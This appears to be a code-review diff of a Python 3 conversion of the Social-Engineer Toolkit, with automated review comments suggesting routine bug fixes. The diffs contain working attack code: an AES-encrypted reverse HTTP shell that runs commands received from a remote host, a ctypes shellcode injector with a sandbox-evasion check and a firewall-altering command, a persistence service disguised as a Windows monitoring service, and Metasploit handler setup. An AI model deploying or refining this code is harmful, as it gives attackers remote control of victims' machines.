print_error("IN ORDER FOR THIS TO WORK YOU MUST INSTALL sun-java6-jdk or openjdk-6-jdk, so apt-get install openjdk-6-jdk")
@ -34,10 +35,12 @@ print_error("*** WARNING ***")
random_string = generate_random_string(10, 30)
# grab keystore to use later
subprocess.Popen("keytool -genkey -alias %s -keystore mykeystore -keypass mykeypass -storepass mystorepass" % (random_string), shell=True).wait()
subprocess.Popen("keytool -genkey -alias %s -keystore mykeystore -keypass mykeypass -storepass mystorepass" %
(random_string), shell=True).wait()
# self-sign the applet
subprocess.Popen("jarsigner -keystore mykeystore -storepass mystorepass -keypass mykeypass -signedjar Signed_Update.jar unsigned.jar %s" % (random_string), shell=True).wait()
subprocess.Popen("jarsigner -keystore mykeystore -storepass mystorepass -keypass mykeypass -signedjar Signed_Update.jar unsigned.jar %s" %
(random_string), shell=True).wait()
# move it into our html directory
subprocess.Popen("cp Signed_Update.jar ../", shell=True).wait()
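Review bot: The exit statuses of the `keytool -genkey` and `jarsigner` calls are discarded after `.wait()`, so when no JDK is installed (the warning printed just above anticipates exactly that case) the script still proceeds to `cp Signed_Update.jar ../` with no jar present and the operator gets only the shell's error output. Capture the status, e.g. `rc = subprocess.Popen(..., shell=True).wait()` followed by `if rc != 0: print_error("keytool/jarsigner failed; is a JDK installed?")` before the copy, and skip the copy on failure. The keystore name and both passwords in the command strings are fixed literals; a one-line comment stating that they are throwaway values for a self-signed keystore written into the working directory would save the next reader from wondering whether they protect anything.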


@ -16,13 +16,14 @@ from src.core.setcore import *
###########################################################
# based on the new update to Java, this no longer works and just shows a big "UNKNOWN".
# to get around that you can purchase your own digital certificate through verisign/thawte
# to get around that you can purchase your own digital certificate through
# verisign/thawte
# grab current path
definepath = definepath()
# print warning message that we need to install sun-java or openjdk
print """
print("""
This menu will allow you to import or create a valid code signing certificate for the Java Applet attack.
You will need to purchase a code signing certificate through GoDaddy, Thawte, Verisign, etc. in order to
@ -35,16 +36,17 @@ print """
Good news is, the process to do that is extremely simple. All in all, it should cost roughly around $300-350 to setup your
business, buy a code signing certificate, and publish an applet to be whatever you want. You can also do a "DBA" or doing
business as which is also much easier to use.
"""
""")
print_error("*** WARNING ***")
print_error("IN ORDER FOR THIS TO WORK YOU MUST INSTALL sun-java6-jdk or openjdk-6-jdk, so apt-get install openjdk-6-jdk")
print_error("*** WARNING ***")
# use flag is in case someone already has a code signing certificate, in that case it bypasses the "no" answer
# use flag is in case someone already has a code signing certificate, in
# that case it bypasses the "no" answer
use_flag = 0
print """
print("""
[--------------------------------]
Initial Selection Process
[--------------------------------]
@ -56,18 +58,20 @@ Option 2 will go through the process of either creating the code signing certifi
1. Import your own java applet into SET (needs to be SIGNED).
2. Either create a code-signing csr or use a code-signing certificate you already own.
"""
firstprompt = raw_input("Enter your choice [1-2]: ")
if firstprompt == "": firstprompt == "2"
""")
firstprompt = input("Enter your choice [1-2]: ")
if firstprompt == "":
firstprompt == "2"
# if we want to import our own java applet
if firstprompt == "1":
newpath = raw_input("Enter the path to the .jar file: ")
newpath = input("Enter the path to the .jar file: ")
if not os.path.isfile(newpath):
while 1:
print_error("Unable to locate the file. Please try again.")
newpath = raw_input("Enter the path to the .jar file: ")
if os.path.isfile(newpath): break
newpath = input("Enter the path to the .jar file: ")
if os.path.isfile(newpath):
break
# import into SET
print_status("Importing the applet into SET for weaponization...")
@ -75,33 +79,41 @@ if firstprompt == "1":
shutil.copyfile(newpath, setdir + "/Signed_Update.jar")
print_status("The applet has been successfully imported into SET.")
# if we want to either generate a certificate or use our own certificate this is it
# if we want to either generate a certificate or use our own certificate
# this is it
if firstprompt == "2":
# prompt for a different certificate
prompt = raw_input(setprompt("0", "Have you already generated a code signing-certificate? [yes|no]")).lower()
prompt = input(setprompt(
"0", "Have you already generated a code signing-certificate? [yes|no]")).lower()
# if we selected yes if we generated a code signing certificate
if prompt == "yes" or prompt == "y":
# prompt the user to import the code signing certificate
cert_path=raw_input(setprompt("0", "Path to the code signing certificate file (provided by CA)"))
cert_path = input(
setprompt("0", "Path to the code signing certificate file (provided by CA)"))
if not os.path.isfile(cert_path):
# loop forever
while 1 == 1:
print_error("ERROR:Filename not found. Try again.")
# re-prompt if we didn't file the filename
cert_path=raw_input(setprompt("0", "Path to the .cer certificate file"))
cert_path = input(
setprompt("0", "Path to the .cer certificate file"))
# if we find the filename then break out of loop
if os.path.isfile(cert_path): break
if os.path.isfile(cert_path):
break
# here is where we import the certificate
try:
print_info("Importing the certificate into SET...")
subprocess.Popen("keytool -import -alias MyCert -file %s" % (cert_path), shell=True).wait()
# trigger that we have our certificate already and bypass the request process below
subprocess.Popen("keytool -import -alias MyCert -file %s" %
(cert_path), shell=True).wait()
# trigger that we have our certificate already and bypass the
# request process below
use_flag = 1
# exception here in case it was already imported before
except: pass
except:
pass
# this will exit the menu
if prompt == "quit" or prompt == "q":
@ -116,46 +128,61 @@ if firstprompt == "2":
# get the stuff ready to do it
print_info("Generating the initial request for Verisign...")
# grab input from user, fqdn
answer1=raw_input(setprompt("0", "FQDN (ex. www.thisisafakecert.com)"))
answer1 = input(
setprompt("0", "FQDN (ex. www.thisisafakecert.com)"))
# grab name of organizaton
answer2=raw_input(setprompt("0", "Name of the organization"))
answer2 = input(setprompt("0", "Name of the organization"))
# grab two letter country code
answer3=raw_input(setprompt("0", "Two letter country code (ex. US)"))
answer3 = input(
setprompt("0", "Two letter country code (ex. US)"))
# if blank, default to US
if answer3 == "": answer3 = "US"
if answer3 == "":
answer3 = "US"
# grab state
answer4=raw_input(setprompt("0", "State"))
answer4 = input(setprompt("0", "State"))
# grab city
answer5=raw_input(setprompt("0", "City"))
answer5 = input(setprompt("0", "City"))
# generate the request crl
subprocess.Popen('keytool -genkey -alias MyCert -keyalg RSA -keysize 2048 -dname "CN=%s,O=%s,C=%s,ST=%s,L=%s"' % (answer1,answer2,answer3, answer4, answer5), shell=True).wait()
subprocess.Popen('keytool -genkey -alias MyCert -keyalg RSA -keysize 2048 -dname "CN=%s,O=%s,C=%s,ST=%s,L=%s"' %
(answer1, answer2, answer3, answer4, answer5), shell=True).wait()
print_info("Exporting the cert request to text file...")
# generate the request and export to certreq
subprocess.Popen("keytool -certreq -alias MyCert > %s/certreq.txt" % (definepath), shell=True).wait()
print_status("Export successful. Exported certificate under the SET root under certreq.txt")
print_warning("You will now need to pay for a code signing certificate through Verisign/Thawte/GoDaddy/etc.")
print_warning("Be sure to purchase a code signing certificate, not a normal website SSL certificate.")
subprocess.Popen(
"keytool -certreq -alias MyCert > %s/certreq.txt" % (definepath), shell=True).wait()
print_status(
"Export successful. Exported certificate under the SET root under certreq.txt")
print_warning(
"You will now need to pay for a code signing certificate through Verisign/Thawte/GoDaddy/etc.")
print_warning(
"Be sure to purchase a code signing certificate, not a normal website SSL certificate.")
print_info("When finished, enter the path to the .cer file below")
# cert_path is used for the certificate path when generating
cert_path = raw_input(setprompt("0", "Path for the code signing certificate file (.spc file)"))
cert_path = input(
setprompt("0", "Path for the code signing certificate file (.spc file)"))
# if we can't find the filename
if not os.path.isfile(cert_path):
while 1 == 1:
print_error("ERROR:Filename not found. Please try again.")
# re-prompt if file name doesn't exist
cert_path = raw_input(setprompt("0", "Path to the .cer certificate file from Verisign"))
cert_path = input(
setprompt("0", "Path to the .cer certificate file from Verisign"))
# if we detect file, then break out of loop
if os.path.isfile(cert_path): break
if os.path.isfile(cert_path):
break
# import the certificate
subprocess.Popen("keytool -import -alias MyCert -file %s" % (cert_path), shell=True).wait()
subprocess.Popen("keytool -import -alias MyCert -file %s" %
(cert_path), shell=True).wait()
# if our certificate is in the data store
if os.path.isfile(cert_path):
# sign the applet with the imported certificate
subprocess.Popen("jarsigner -signedjar Signed_Update.jar %s/src/html/unsigned/unsigned.jar MyCert" % (definepath), shell=True).wait()
subprocess.Popen("jarsigner -signedjar Signed_Update.jar %s/src/html/unsigned/unsigned.jar MyCert" %
(definepath), shell=True).wait()
# move it into our html directory
subprocess.Popen("mv Signed_Update.jar %s/Signed_Update.jar.orig" % (setdir), shell=True).wait()
subprocess.Popen(
"mv Signed_Update.jar %s/Signed_Update.jar.orig" % (setdir), shell=True).wait()
# move back to original directory
print_status("Java Applet is now signed and will be imported into the java applet website attack from now on...")
print_status(
"Java Applet is now signed and will be imported into the java applet website attack from now on...")
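Review bot: Splitting the one-liner under `firstprompt = input("Enter your choice [1-2]: ")` preserved a no-op: the body `firstprompt == "2"` compares instead of assigning, so an empty answer never defaults to option 2 and neither of the two `if firstprompt == ...` branches runs. Change it to `firstprompt = "2"`. Separately, the operator-supplied `cert_path` is interpolated into a `shell=True` command string for both `keytool -import` calls; a list form such as `subprocess.Popen(["keytool", "-import", "-alias", "MyCert", "-file", cert_path]).wait()` behaves the same and does not hand paths containing spaces or shell metacharacters to the shell. The bare `except: pass` around the first import is commented as covering an already-imported alias, but it equally hides a missing `keytool` binary, so narrowing it or printing the exception would help.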


@ -3,7 +3,9 @@
import sys
import setcore
me = setcore.mod_name()
setcore.debug_msg(me,"importing 'src.html.spawn'",1)
setcore.debug_msg(me, "importing 'src.html.spawn'", 1)
sys.path.append("src/html")
try: reload(spawn)
except: pass
try:
reload(spawn)
except:
pass
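Review bot: `reload` is no longer a builtin in Python 3, so after this py3 conversion `reload(spawn)` raises NameError and the bare `except: pass` swallows it, turning the reload into a silent no-op. Unless `spawn` is imported in the two lines above the hunk, the name is also undefined here (only `sys` and `setcore` are imported in view), which would have failed the same way under Python 2. Use `import importlib` with `importlib.reload(spawn)` after an explicit `import spawn`, and narrow the handler to `except ImportError:` so a real failure is not hidden. The earlier webserver-stop hunk has the same pattern with `reload(src.core.webserver)`.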


@ -1,6 +1,6 @@
<#
Powershell Code Execution 'Exploit'
Author: Matthew Graeber
Author: Matthew Graeber (aka my superhero infosec crush)
Disclaimer: This code is provided for academic purposes only and should not be used for evil. You are liable for your own actions.
#>


@ -8,8 +8,10 @@ from src.core.setcore import *
# grab stage encoding flag
stage_encoding = check_config("STAGE_ENCODING=").lower()
if stage_encoding == "off": stage_encoding = "false"
else: stage_encoding = "true"
if stage_encoding == "off":
stage_encoding = "false"
else:
stage_encoding = "true"
# check to see if we are just generating powershell code
powershell_solo = check_options("POWERSHELL_SOLO")
@ -25,22 +27,25 @@ pyinjection = check_options("PYINJECTION=")
if pyinjection == "ON":
# check to ensure that the payload options were specified right
if os.path.isfile(setdir + "/payload_options.shellcode"):
pyinjection = "on"
print_status("Multi/Pyinjection was specified. Overriding config options.")
else: pyinjection = "off"
pyinjection = "on"
print_status(
"Multi/Pyinjection was specified. Overriding config options.")
else:
pyinjection = "off"
# grab ipaddress
if check_options("IPADDR=") != 0:
ipaddr = check_options("IPADDR=")
else:
ipaddr = raw_input("Enter the ipaddress for the reverse connection: ")
ipaddr = input("Enter the ipaddress for the reverse connection: ")
update_options("IPADDR=" + ipaddr)
# check to see if we are using multi powershell injection
multi_injection = check_config("POWERSHELL_MULTI_INJECTION=").lower()
# turn off multi injection if pyinjection is specified
if pyinjection == "on": multi_injection = "off"
if pyinjection == "on":
multi_injection = "off"
# check what payloads we are using
powershell_inject_x86 = check_config("POWERSHELL_INJECT_PAYLOAD_X86=")
@ -55,18 +60,24 @@ if os.path.isfile("%s/meta_config_multipyinjector" % (setdir)):
# if we have multi injection on, don't worry about these
if multi_injection != "on":
if pyinjection == "off":
print_status("POWERSHELL_INJECTION is set to ON with multi-pyinjector")
port=raw_input(setprompt(["4"], "Enter the port for Metasploit to listen on for powershell [443]"))
if port == "": port = "443"
fileopen = file("%s/meta_config_multipyinjector" % (setdir), "r")
print_status(
"POWERSHELL_INJECTION is set to ON with multi-pyinjector")
port = input(setprompt(
["4"], "Enter the port for Metasploit to listen on for powershell [443]"))
if port == "":
port = "443"
fileopen = open("%s/meta_config_multipyinjector" % (setdir), "r")
data = fileopen.read()
match = re.search(port, data)
if not match:
filewrite = file("%s/meta_config_multipyinjector" % (setdir), "a")
filewrite = open(
"%s/meta_config_multipyinjector" % (setdir), "a")
filewrite.write("\nuse exploit/multi/handler\n")
if auto_migrate == "ON":
filewrite.write("set AutoRunScript post/windows/manage/smart_migrate\n")
filewrite.write("set PAYLOAD %s\nset LHOST %s\nset LPORT %s\nset EnableStageEncoding %s\nset ExitOnSession false\nexploit -j\n" % (powershell_inject_x86, ipaddr, port, stage_encoding))
filewrite.write(
"set AutoRunScript post/windows/manage/smart_migrate\n")
filewrite.write("set PAYLOAD %s\nset LHOST %s\nset LPORT %s\nset EnableStageEncoding %s\nset ExitOnSession false\nexploit -j\n" %
(powershell_inject_x86, ipaddr, port, stage_encoding))
filewrite.close()
# if we have multi injection on, don't worry about these
@ -78,19 +89,22 @@ if multi_injection != "on":
port = check_options("PORT=")
# if port.options isnt there then prompt
else:
port=raw_input(setprompt(["4"], "Enter the port for Metasploit to listen on for powershell [443]"))
if port == "": port = "443"
port = input(setprompt(
["4"], "Enter the port for Metasploit to listen on for powershell [443]"))
if port == "":
port = "443"
update_options("PORT=" + port)
# turn off multi_injection if we are riding solo from the powershell menu
if powershell_solo == "ON":
if powershell_solo == "ON":
multi_injection = "off"
pyinjection = "on"
# if we are using multi powershell injection
if multi_injection == "on":
if pyinjection == "off":
print_status("Multi-Powershell-Injection is set to ON, this should be sweet...")
print_status(
"Multi-Powershell-Injection is set to ON, this should be sweet...")
# define a base variable
x86 = ""
@ -108,69 +122,81 @@ if multi_injection == "on":
for ports in port:
# dont cycle through if theres a blank
if ports != "":
print_status("Generating x86-based powershell injection code for port: %s" % (ports))
multi_injection_x86 = multi_injection_x86 + "," + generate_powershell_alphanumeric_payload(powershell_inject_x86, ipaddr, ports, x86)
print_status(
"Generating x86-based powershell injection code for port: %s" % (ports))
multi_injection_x86 = multi_injection_x86 + "," + \
generate_powershell_alphanumeric_payload(
powershell_inject_x86, ipaddr, ports, x86)
if os.path.isfile("%s/meta_config_multipyinjector" % (setdir)):
port_check = check_ports("%s/meta_config_multipyinjector" % (setdir), ports)
port_check = check_ports(
"%s/meta_config_multipyinjector" % (setdir), ports)
if port_check == False:
filewrite = file("%s/meta_config_multipyinjector" % (setdir), "a")
filewrite = open(
"%s/meta_config_multipyinjector" % (setdir), "a")
filewrite.write("\nuse exploit/multi/handler\n")
if auto_migrate == "ON":
filewrite.write("set AutoRunScript post/windows/manage/smart_migrate\n")
filewrite.write("set PAYLOAD %s\nset LHOST %s\nset EnableStageEncoding %s\nset LPORT %s\nset ExitOnSession false\nexploit -j\n\n" % (powershell_inject_x86, ipaddr, stage_encoding, ports))
filewrite.write(
"set AutoRunScript post/windows/manage/smart_migrate\n")
filewrite.write("set PAYLOAD %s\nset LHOST %s\nset EnableStageEncoding %s\nset LPORT %s\nset ExitOnSession false\nexploit -j\n\n" % (
powershell_inject_x86, ipaddr, stage_encoding, ports))
filewrite.close()
# if we aren't using multi pyinjector
if not os.path.isfile("%s/meta_config_multipyinjector" % (setdir)):
# if meta config isn't created yet then create it
if not os.path.isfile("%s/meta_config" % (setdir)):
filewrite = file("%s/meta_config" % (setdir), "w")
filewrite = open("%s/meta_config" % (setdir), "w")
filewrite.write("")
filewrite.close()
port_check = check_ports("%s/meta_config" % (setdir), ports)
if port_check == False:
filewrite = file("%s/meta_config" % (setdir), "a")
filewrite = open("%s/meta_config" % (setdir), "a")
filewrite.write("\nuse exploit/multi/handler\n")
if auto_migrate == "ON":
filewrite.write("set AutoRunScript post/windows/manage/smart_migrate\n")
filewrite.write("set PAYLOAD %s\nset LHOST %s\nset EnableStageEncoding %s\nset ExitOnSession false\nset LPORT %s\nexploit -j\n\n" % (powershell_inject_x86, ipaddr, stage_encoding, ports))
filewrite.write(
"set AutoRunScript post/windows/manage/smart_migrate\n")
filewrite.write("set PAYLOAD %s\nset LHOST %s\nset EnableStageEncoding %s\nset ExitOnSession false\nset LPORT %s\nexploit -j\n\n" % (
powershell_inject_x86, ipaddr, stage_encoding, ports))
filewrite.close()
# here we do everything if pyinjection or multi pyinjection was specified
if pyinjection == "on":
multi_injection_x86 = ""
# read in the file we need for parsing
fileopen = file(setdir + "/payload_options.shellcode", "r")
payloads = fileopen.read()[:-1].rstrip() # strips an extra ,
fileopen = open(setdir + "/payload_options.shellcode", "r")
payloads = fileopen.read()[:-1].rstrip() # strips an extra ,
payloads = payloads.split(",")
# format: payload<space>port
for payload in payloads:
#format: payload<space>port
# format: payload<space>port
payload = payload.split(" ")
powershell_inject_x86 = payload[0]
port = payload[1]
port = payload[1]
print_status("Generating x86-based powershell injection code...")
multi_injection_x86 = multi_injection_x86 + "," + generate_powershell_alphanumeric_payload(powershell_inject_x86, ipaddr, port, x86)
multi_injection_x86 = multi_injection_x86 + "," + \
generate_powershell_alphanumeric_payload(
powershell_inject_x86, ipaddr, port, x86)
# if its turned to off
if multi_injection == "off":
if pyinjection == "off":
print_status("Generating x86-based powershell injection code...")
x86 = generate_powershell_alphanumeric_payload(powershell_inject_x86, ipaddr, port, x86)
x86 = generate_powershell_alphanumeric_payload(
powershell_inject_x86, ipaddr, port, x86)
# if we are specifying multi powershell injection
if multi_injection == "on" or pyinjection == "on":
x86 = multi_injection_x86[1:] # remove comma at beginning
x86 = multi_injection_x86[1:] # remove comma at beginning
# check to see if we want to display the powershell command to the user
verbose = check_config("POWERSHELL_VERBOSE=")
if verbose.lower() == "on":
print_status("Printing the x86 based encoded code...")
time.sleep(3)
print x86
print(x86)
filewrite = file("%s/x86.powershell" % (setdir), "w")
filewrite = open("%s/x86.powershell" % (setdir), "w")
filewrite.write(x86)
filewrite.close()
print_status("Finished generating powershell injection bypass.")
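Review bot: The handles opened as `fileopen = open("%s/meta_config_multipyinjector" % (setdir), "r")` in the single-port branch and as `fileopen = open(setdir + "/payload_options.shellcode", "r")` in the pyinjection branch are never closed; only the `filewrite` handles get a `.close()`. Now that these are `open()` calls, write them as `with open(path, "r") as fileopen:` with the `.read()` inside the block. In the same hunk `re.search(port, data)` treats the operator-entered port as a regex and matches any substring, so entering `44` would be reported as already present in a file that only contains `443`; since the file is written with `set LPORT %s\n`, an exact test such as `if ("set LPORT %s\n" % port) not in data:` (assuming the handler file is produced only by these writes) is both simpler and correct.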

50
src/payloads/set_payloads/http_shell.py Executable file → Normal file

@ -1,5 +1,5 @@
#!/usr/bin/python
##########################################################################################################################
##########################################################################
#
#
# AES Encrypted Reverse HTTP Shell by:
@ -7,41 +7,41 @@
# Dave Kennedy (ReL1K)
# http://www.trustedsec.com
#
##########################################################################################################################
##########################################################################
#
##########################################################################################################################
##########################################################################
#
# To compile, you will need pyCrypto, it's a pain to install if you do it from source, should get the binary modules
# to make it easier. Can download from here:
# http://www.voidspace.org.uk/cgi-bin/voidspace/downman.py?file=pycrypto-2.0.1.win32-py2.5.zip
#
##########################################################################################################################
##########################################################################
#
# This shell works on any platform you want to compile it in. OSX, Windows, Linux, etc.
#
##########################################################################################################################
##########################################################################
#
##########################################################################################################################
##########################################################################
#
# Below is the steps used to compile the binary. py2exe requires a dll to be used in conjunction
# so py2exe was not used. Instead, pyinstaller was used in order to byte compile the binary.
#
##########################################################################################################################
##########################################################################
#
# export VERSIONER_PYTHON_PREFER_32_BIT=yes
# python Configure.py
# python Makespec.py --onefile --noconsole shell.py
# python Build.py shell/shell.spec
#
###########################################################################################################################
##########################################################################
import urllib
import urllib2
import urllib.request, urllib.parse, urllib.error
import urllib.request, urllib.error, urllib.parse
from Crypto.Cipher import AES
import sys
import os
import httplib
import http.client
import subprocess
import base64
import time
@ -79,11 +79,11 @@ PASSWORD = "password_here"
# here is where we set all of our proxy settings
if PROXY_SUPPORT == "ON":
auth_handler = urllib2.HTTPBasicAuthHandler()
auth_handler = urllib.request.HTTPBasicAuthHandler()
auth_handler.add_password(realm='RESTRICTED ACCESS', uri=PROXY_URL,
user=USERNAME, passwd=PASSWORD)
opener = urllib2.build_opener(auth_handler)
urllib2.install_opener(opener)
opener = urllib.request.build_opener(auth_handler)
urllib.request.install_opener(opener)
try:
# our reverse listener ip address
@ -93,19 +93,19 @@ try:
# except that we didn't pass parameters
except IndexError:
print " \nAES Encrypted Reverse HTTP Shell by:"
print " Dave Kennedy (ReL1K)"
print " http://www.trustedsec.com"
print "Usage: shell.exe <reverse_ip_address> <rport>"
print(" \nAES Encrypted Reverse HTTP Shell by:")
print(" Dave Kennedy (ReL1K)")
print(" http://www.trustedsec.com")
print("Usage: shell.exe <reverse_ip_address> <rport>")
time.sleep(0.1)
sys.exit()
# loop forever
while 1:
# open up our request handelr
req = urllib2.Request('http://%s:%s' % (address,port))
req = urllib.request.Request('http://%s:%s' % (address, port))
# grab our response which contains what command we want
message = urllib2.urlopen(req)
message = urllib.request.urlopen(req)
# base64 unencode
message = base64.b64decode(message.read())
# decrypt the communications
@ -115,7 +115,8 @@ while 1:
sys.exit()
# issue the shell command we want
message = message.replace("{", "")
proc = subprocess.Popen(message, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
proc = subprocess.Popen(message, shell=True,
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
# read out the data of stdout
data = proc.stdout.read() + proc.stderr.read()
# encrypt the data
@ -123,10 +124,11 @@ while 1:
# base64 encode the data
data = base64.b64encode(data)
# urlencode the data from stdout
data = urllib.urlencode({'cmd': '%s'}) % (data)
data = urllib.parse.urlencode({'cmd': '%s'}) % (data)
# who we want to connect back to with the shell
h = httplib.HTTPConnection('%s:%s' % (address,port))
h = http.client.HTTPConnection('%s:%s' % (address, port))
# set our basic headers
headers = {"User-Agent" : "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)","Content-type": "application/x-www-form-urlencoded", "Accept": "text/plain"}
headers = {"User-Agent": "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)",
"Content-type": "application/x-www-form-urlencoded", "Accept": "text/plain"}
# actually post the data
h.request('POST', '/index.aspx', data, headers)
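Review bot: The two consecutive lines `import urllib.request, urllib.parse, urllib.error` and `import urllib.request, urllib.error, urllib.parse` are the 2to3 expansion of the old `urllib` and `urllib2` imports and bring in the same three modules twice. Keep a single set, one module per line (`import urllib.error`, `import urllib.parse`, `import urllib.request`) per PEP 8, and drop the duplicate.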

546
src/payloads/set_payloads/listener.py Executable file → Normal file


196
src/payloads/set_payloads/multi_pyinjector.py Executable file → Normal file

@ -1,96 +1,100 @@
#
# The Social-Engineer Toolkit Multi-PyInjector revised and simplified version.
# Version: 0.4
#
# This will spawn only a seperate thread per each shellcode instance.
#
# Much cleaner and optimized code. No longer needs files and is passed via
# command line.
#
# Incorporates AES 256 Encryption when passing shellcode
import ctypes
import sys
import subprocess
import os
import base64
from Crypto.Cipher import AES
import multiprocessing
import threading
# added sandbox evasion here - most sandboxes use only 1 core
if multiprocessing.cpu_count() < 2:
exit()
# define our shellcode injection code through ctypes
def injection(sc):
sc = sc.decode("string_escape")
sc = bytearray(sc)
# Initial awesome code and credit found here:
# http://www.debasish.in/2012_04_01_archive.html
ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),
ctypes.c_int(len(sc)),
ctypes.c_int(0x3000),
ctypes.c_int(0x40))
ctypes.windll.kernel32.VirtualLock(ctypes.c_int(ptr),
ctypes.c_int(len(sc)))
buf = (ctypes.c_char * len(sc)).from_buffer(sc)
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr),
buf,
ctypes.c_int(len(sc)))
ht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),
ctypes.c_int(0),
ctypes.c_int(ptr),
ctypes.c_int(0),
ctypes.c_int(0),
ctypes.pointer(ctypes.c_int(0)))
ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht),ctypes.c_int(-1))
if __name__ == '__main__':
multiprocessing.freeze_support()
subprocess.Popen("netsh advfirewall set global StatefulFTP disable", stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
# this will be our ultimate filename we use for the shellcode generate
# by the Social-Engineer Toolkit
try:
# our file containing shellcode
if len(sys.argv[1]) > 1:
payload_filename = sys.argv[1]
if os.path.isfile(payload_filename):
fileopen = file(payload_filename, "r")
sc = fileopen.read()
# if we didn't file our shellcode path then exit out
if not os.path.isfile(payload_filename):
sys.exit()
if len(sys.argv[2]) > 1:
# this is our secret key for decrypting the AES encrypted traffic
secret = sys.argv[2]
secret = base64.b64decode(secret)
# the character used for padding--with a block cipher such as AES, the value
# you encrypt must be a multiple of BLOCK_SIZE in length. This character is
# used to ensure that your value is always a multiple of BLOCK_SIZE
PADDING = '{'
BLOCK_SIZE = 32
# one-liner to sufficiently pad the text to be encrypted
pad = lambda s: s + (BLOCK_SIZE - len(s) % BLOCK_SIZE) * PADDING
# one-liners to decrypt a string which will be our shellcode
DecryptAES = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(PADDING)
cipher = AES.new(secret)
# our decrypted value for shellcode
sc = DecryptAES(cipher, sc)
# split our shellcode into a list
sc = sc.split(",")
# except an indexerror and allow it to continue forward
except IndexError:
sys.exit()
jobs = []
for payload in sc:
if payload != "":
p = multiprocessing.Process(target=injection, args=(payload,))
jobs.append(p)
p.start()
#
# The Social-Engineer Toolkit Multi-PyInjector revised and simplified version.
# Version: 0.4
#
# This will spawn only a seperate thread per each shellcode instance.
#
# Much cleaner and optimized code. No longer needs files and is passed via
# command line.
#
# Incorporates AES 256 Encryption when passing shellcode
import ctypes
import sys
import subprocess
import os
import base64
from Crypto.Cipher import AES
import multiprocessing
import threading
# added sandbox evasion here - most sandboxes use only 1 core
if multiprocessing.cpu_count() < 2:
exit()
# define our shellcode injection code through ctypes
def injection(sc):
sc = sc.decode("string_escape")
sc = bytearray(sc)
# Initial awesome code and credit found here:
# http://www.debasish.in/2012_04_01_archive.html
ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),
ctypes.c_int(len(sc)),
ctypes.c_int(0x3000),
ctypes.c_int(0x40))
ctypes.windll.kernel32.VirtualLock(ctypes.c_int(ptr),
ctypes.c_int(len(sc)))
buf = (ctypes.c_char * len(sc)).from_buffer(sc)
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr),
buf,
ctypes.c_int(len(sc)))
ht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),
ctypes.c_int(0),
ctypes.c_int(ptr),
ctypes.c_int(0),
ctypes.c_int(0),
ctypes.pointer(ctypes.c_int(0)))
ctypes.windll.kernel32.WaitForSingleObject(
ctypes.c_int(ht), ctypes.c_int(-1))
if __name__ == '__main__':
multiprocessing.freeze_support()
subprocess.Popen("netsh advfirewall set global StatefulFTP disable",
stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
# this will be our ultimate filename we use for the shellcode generate
# by the Social-Engineer Toolkit
try:
# our file containing shellcode
if len(sys.argv[1]) > 1:
payload_filename = sys.argv[1]
if os.path.isfile(payload_filename):
fileopen = open(payload_filename, "r")
sc = fileopen.read()
# if we didn't file our shellcode path then exit out
if not os.path.isfile(payload_filename):
sys.exit()
if len(sys.argv[2]) > 1:
# this is our secret key for decrypting the AES encrypted traffic
secret = sys.argv[2]
secret = base64.b64decode(secret)
# the character used for padding--with a block cipher such as AES, the value
# you encrypt must be a multiple of BLOCK_SIZE in length. This character is
# used to ensure that your value is always a multiple of BLOCK_SIZE
PADDING = '{'
BLOCK_SIZE = 32
# one-liner to sufficiently pad the text to be encrypted
pad = lambda s: s + (BLOCK_SIZE - len(s) % BLOCK_SIZE) * PADDING
# one-liners to decrypt a string which will be our shellcode
DecryptAES = lambda c, e: c.decrypt(
base64.b64decode(e)).rstrip(PADDING)
cipher = AES.new(secret)
# our decrypted value for shellcode
sc = DecryptAES(cipher, sc)
# split our shellcode into a list
sc = sc.split(",")
# except an indexerror and allow it to continue forward
except IndexError:
sys.exit()
jobs = []
for payload in sc:
if payload != "":
p = multiprocessing.Process(target=injection, args=(payload,))
jobs.append(p)
p.start()

40
src/payloads/set_payloads/persistence.py Executable file → Normal file

@ -1,19 +1,19 @@
#!/usr/bin/python
#
#####################################################################################################################
##########################################################################
#
# Social-Engineer Toolkit Persistence Service
#
# Right now this is a pretty lame attempt at a service but will grow over time. The text file it reads in from isn't
# really a good idea, but it's a start.
#
#####################################################################################################################
##########################################################################
#
# ex usage: persistence.exe install, start, stop, remove
#
# You can see output of this program running python site-packages\win32\lib\win32traceutil for debugging
#
#####################################################################################################################
##########################################################################
import win32service
import win32serviceutil
@ -27,32 +27,33 @@ import sys
import os
import subprocess
class aservice(win32serviceutil.ServiceFramework):
_svc_name_ = "windows_monitoring"
_svc_display_name_ = "Windows File Monitoring Service"
_svc_deps_ = ["EventLog"]
def __init__(self,args):
win32serviceutil.ServiceFramework.__init__(self,args)
self.hWaitStop=win32event.CreateEvent(None, 0, 0, None)
self.isAlive=True
def __init__(self, args):
win32serviceutil.ServiceFramework.__init__(self, args)
self.hWaitStop = win32event.CreateEvent(None, 0, 0, None)
self.isAlive = True
def SvcStop(self):
# tell Service Manager we are trying to stop (required)
self.ReportServiceStatus(win32service.SERVICE_STOP_PENDING)
# set the event to call
win32event.SetEvent(self.hWaitStop)
self.isAlive=False
self.isAlive = False
def SvcDoRun(self):
import servicemanager
# wait for beeing stopped ...
self.timeout=1000 # In milliseconds (update every second)
self.timeout = 1000 # In milliseconds (update every second)
while self.isAlive:
# wait for service stop signal, if timeout, loop again
rc=win32event.WaitForSingleObject(self.hWaitStop, self.timeout)
rc = win32event.WaitForSingleObject(self.hWaitStop, self.timeout)
# expand the filesystem path
windir=os.environ['WINDIR']
windir = os.environ['WINDIR']
# grab homepath
homedir_path = os.getenv("SystemDrive")
homedir_path = homedir_path + "\\Program Files\\Common Files\\"
@ -62,15 +63,18 @@ class aservice(win32serviceutil.ServiceFramework):
windows_version = int(windows_version)
# windows XP and below
